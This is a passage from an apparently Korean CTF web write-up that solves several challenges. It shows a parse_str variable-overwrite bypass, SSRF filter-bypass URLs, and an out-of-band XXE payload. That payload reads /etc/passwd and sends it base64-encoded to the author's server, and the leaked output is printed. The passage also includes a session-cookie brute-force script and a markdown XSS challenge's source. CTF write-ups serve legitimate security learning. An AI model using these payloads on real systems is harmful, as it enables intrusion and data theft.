        $action = $parsed_query['action'];
    }

    if($action==="auth"){
        $key = $_GET["key"];
        $hashed_input = hash('sha256', $key);
        //echo $hashed_input.'\n';
        if($hashed_input!==$hashed_key){
            die("GTFO!");
        }

        echo file_get_contents("/flag");
    }
}else{
    show_source(__FILE__);
}
?>

인풋의 sha256값이 79abe9e217c2532193f910434453b2b9521a94c25ddc2e34f55947dea77d70ff 값이어야 하는데 해당 값은 레인보우 테이블에서 조회되지 않는 값이라 원본 값을 모른다.

근데 딱봐도 수상한게 action파라미터 값 받아올 때 $_GET['action'] 일케 안받고 parse_str쓰고 있다. parse_str은 변수를 덮을 수 있어서 그냥 hashed_key를 덮어버리면 된다.

payload

http://easyphp.ctf.euristica.in/?action=auth&key=1&hashed_key=6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

Online Previewer 1

SSRF 문제다. 소스에서 http://127.0.0.1:1337로 접근하라고 하는데 필터가 되어있다.

http://asdf@127.0.0.1:1337

http://asdf#@127.0.0.1:1337

http://asdf?@127.0.0.1:1337

http://2130706433:1337/

http://0177.0.0.1:1337/

http://localhost:1337/

http://my_server/test.php

test.php

<?php

header('Location: http://127.0.0.1:1337');

?>

..등등

요런거 다 안먹혀서 localhost말고 127.0.0.1 반환해주는 도메인을 사용했다.

payload 

http://lvh.me:1337

ImgAccess

근래 풀어본 CTF 웹 문제중에 가장 재미있게 풀어서 오랜만에 자세하게 풀이를 남겨봤다.

먼저 문제에서 코드를 제공해 준다. 총 3개의 PHP 파일을 주는데 각  소스는 아래와 같다.

index.php

<?php

session_start();

?>

<!DOCTYPE html>

<html lang="en">

<head>

    <link type="text/css" rel="stylesheet" href="style.css" />

</head>

<body>

            <div class="container">

                <img src="static/robot.png" class="centered imgrobot" />

                <form method="post" action="upload.php" enctype="multipart/form-data">

                        <input type="file" onchange="this.form.submit()" name="image" class="btn"/>

                </form>

                <hr>

                <div class="center">

                <?php

                $base_dir = "images/" . session_id() . "/";

                foreach (glob($base_dir . "*_thumb*") as $filename) {

                    // cut off _thumb.jpg

                    $fname = substr($filename, 0, -10);

                    $large_fname = glob( $fname . "*")[0];

                    echo "<a href='$large_fname'><img src='$filename' /></a>\n";

                }

                ?>

                </div>

            </div>

</body>

</html>

gallery.php

<?php

session_start();

?>

<!DOCTYPE html>

<html lang="en">

<head>

    <link type="text/css" rel="stylesheet" href="style.css" />

</head>

<body>

<form method="post" action="upload.php" enctype="multipart/form-data">

    <div class="container">

        <h1>Your Uploaded Images:</h1>

        <?php

        $base_dir = "images/" . session_id() . "/";

        foreach (glob($base_dir . "*_thumb*") as $filename) {

            // cut off _thumb.jpg

            $fname = substr($filename, 0, -10);

            $large_fname = glob( $fname . "*")[0];

            echo "<a href='$large_fname'><img src='$filename' /></a>\n";

        }

        ?>

    </div>

    <div class="container">

        <a href="index.php">Upload More</a></span>

    </div>

</form>

</body>

</html>

upload.php

<?php

session_start();

function calcImageSize($file, $mime_type) {

    if ($mime_type == "image/png"||$mime_type == "image/jpeg") {

        $stats = getimagesize($file);  // Doesn't work for svg...

        $width = $stats[0];

        $height = $stats[1];

    } else {

        $xmlfile = file_get_contents($file);

        $dom = new DOMDocument();

        $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);

        $svg = simplexml_import_dom($dom);

        $attrs = $svg->attributes();

        $width = (int) $attrs->width;

        $height = (int) $attrs->height;

    }

    return [$width, $height];

}

class Image {

    function __construct($tmp_name)

    {

        $allowed_formats = [

            "image/png" => "png",

            "image/jpeg" => "jpg",

            "image/svg+xml" => "svg"

        ];

        $this->tmp_name = $tmp_name;

        $this->mime_type = mime_content_type($tmp_name);

        if (!array_key_exists($this->mime_type, $allowed_formats)) {

            // I'd rather 500 with pride than 200 without security

            die("Invalid Image Format!");

        }

        $size = calcImageSize($tmp_name, $this->mime_type);

        if ($size[0] * $size[1] > 1337 * 1337) {

            die("Image too big!");

        }

        $this->extension = "." . $allowed_formats[$this->mime_type];

        $this->file_name = sha1(random_bytes(20));

        $this->folder = $file_path = "images/" . session_id() . "/";

    }

    function create_thumb() {

        $file_path = $this->folder . $this->file_name . $this->extension;

        $thumb_path = $this->folder . $this->file_name . "_thumb.jpg";

        system('convert ' . $file_path . " -resize 200x200! " . $thumb_path);

    }

    function __destruct()

    {

        if (!file_exists($this->folder)){

            mkdir($this->folder);

        }

        $file_dst = $this->folder . $this->file_name . $this->extension;

        move_uploaded_file($this->tmp_name, $file_dst);

        $this->create_thumb();

    }

}

new Image($_FILES['image']['tmp_name']);

header('Location: index.php');

위 코드 중 핵심 코드는 upload.php인데 해당 소스를 쭉 오디팅 하다보면 취약점이 터질만한 곳이 대충 3군데가 보인다.

일단 기본적인 웹쉘 업로드 같은 경우는 불가능한데 코드에서 눈에 띄는게 일단 svg업로드 시 xml parsing, 파일 convert 시 system 명령어를 사용, __destruct 매직 메서드의 존재이다.

대충 위의 포인트로 터질만하다고 보여진건 xxe, command injection, imagemagik rce, php objection injection 정도였다. 근데 각 취약점 별로 실제 트리거가 가능할지 검증이 필요했다.

먼저 가장 먼저 해볼만한게 xxe였다. 코드를 보면 별다른 필터가 없어서 Externel Entity만 활성화되어있으면 그냥 로직만 쭉 따라가면 당연히 될만한 상황이었다.

파싱 후 데이터가 뿌려지는 부분이 없어서 oob를 통해 아래와 같이 검증을 해보니 실제로 xxe가 터지는걸 확인할 수 있었다.

ssr.svg

<!DOCTYPE svg [

<!ENTITY % dtd SYSTEM "http://my_ip/test.dtd">

%dtd;

%param1;

]>

<svg>&ssr;</svg>

test.dtd

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

<!ENTITY % param1 "<!ENTITY ssr SYSTEM 'http://my_ip:9999/%data;'>">

/etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

_apt:x:100:65534::/nonexistent:/bin/false

messagebus:x:101:101::/var/run/dbus:/bin/false

Flag: midnight{R3lying_0n_PHP_4lw45_W0rKs}

Hashish

아래 함수 결과에 해당하는 결과 값을 파일로 제공해 준다.

__int64 __fastcall genhash(char *input)

{

  unsigned int v1; // eax

  char *v2; // rax

  __int64 input_byte; // rax

  char *v4; // [rsp+8h] [rbp-18h]

  unsigned int count; // [rsp+14h] [rbp-Ch]

  signed __int64 v6; // [rsp+18h] [rbp-8h]

  v4 = input;

  v6 = 13LL;

  count = 0;

  while ( 1 )

  {

    v2 = v4++;

    input_byte = (unsigned int)*v2;

    if ( !(_DWORD)input_byte )

      break;

    v6 = 3 * v6 + (signed int)input_byte;

    v1 = count++;

    printf("hash-%d : %ld\n", v1, v6);

  }

  return input_byte;

}

hash.txt

hash-0 : 138

hash-1 : 512

hash-2 : 1645

hash-3 : 5034

hash-4 : 15218

hash-5 : 45756

hash-6 : 137391

hash-7 : 412292

hash-8 : 1236927

hash-9 : 3710845

hash-10 : 11132642

hash-11 : 33398021

hash-12 : 100194167

hash-13 : 300582553

hash-14 : 901747774

hash-15 : 2705243426

hash-16 : 8115730373

hash-17 : 24347191171

hash-18 : 73041573621

hash-19 : 219124720917

hash-20 : 657374162799

hash-21 : 1972122488522

hash-22 : 5916367465576

Long road

cool[넘버] 페이지 Brute Force해주면 플래그 나오는 페이지가 있다.

In mountains I feel fresh

페이지 요청할때 마다 세션값이 다시 세팅되는데 이거 파싱해서 다음 페이지 요청할때 세션 값 재 세팅해주는 식으로 Brute Force 해주면 된다.

solve.py

import requests

def request(cookie):

    url = "http://cbmctf2019.cf:5001/"

    headers = {'Cookie': 'session=' + cookie}

    response = requests.get(url, headers=headers)

    if "cbmctf" in response.text:

        print response.text

    return response.headers['Set-Cookie'].replace("session=","").replace("; HttpOnly; Path=/","")

cookie = "eyJ2aXNpdHMiOjUwfQ.XKn_Hg.nLw94DRaPh2xkEeMUuApvcihnBo"

for i in range(0,1000):

    cookie = request(cookie)

    print cookie

마크다운 컨셉의 XSS 문제다.

코드를 보면 아래와 같다.

<head>

    <meta charset="UTF-8">

    <link rel="stylesheet" href="/static/style.css" />

    <script src="https://code.jquery.com/jquery-3.3.1.slim.min.js"></script>

</head>

<script>

input = decodeURIComponent(location.search.match(/input=([^&#]+)/)[1]);

function markdown(text){

  text = text

.replace(/[<]/g, '')

.replace(/----/g,'<hr>')

.replace(/> ?([^\n]+)/g, '<blockquote>$1</blockquote>')

.replace(/\*\*([^*]+)\*\*/g, '<b>$1</b>')

.replace(/__([^_]+)__/g, '<b>$1</b>')

.replace(/\*([^\s][^*]+)\*/g, '<i>$1</i>')

.replace(/\* ([^*]+)/g, '<li>$1</li>')

.replace(/##### ([^#\n]+)/g, '<h5>$1</h5>')

.replace(/#### ([^#\n]+)/g, '<h4>$1</h4>')

.replace(/### ([^#\n]+)/g, '<h3>$1</h3>')

.replace(/## ([^#\n]+)/g, '<h2>$1</h2>')

.replace(/# ([^#\n]+)/g, '<h1>$1</h1>')

.replace(/(?<!\()(https?:\/\/[a-zA-Z0-9./?#-]+)/g, '<a href="$1">$1</a>')

.replace(/!\[([^\]]+)\]\((https?:\/\/[a-zA-Z0-9./?#]+)\)/g, '<img src="$2" alt="$1"/>')

.replace(/(?<!!)\[([^\]]+)\]\((https?:\/\/[a-zA-Z0-9./?#-]+)\)/g, '<a href="$2">$1</a>')

.replace(/`([^`]+)`/g, '<code>$1</code>')

.replace(/```([^`]+)```/g, '<code>$1</code>')

.replace(/\n/g, "<br>");

  return text;

}

window.onload=function(){

  $("#markdown").text(input);

  $("#rendered").html(markdown(input));

}

</script>

<h1>Input:</h1><br>

<pre contenteditable id="markdown" class="background-grey"></pre><br>

<br>

<button onclick='$("#rendered").html(markdown($("#markdown").text()))'>Update preview</button>

<hr>

<br>

<h1>Preview:</h1><br>

<div id="rendered" class="rendered background-grey"></div>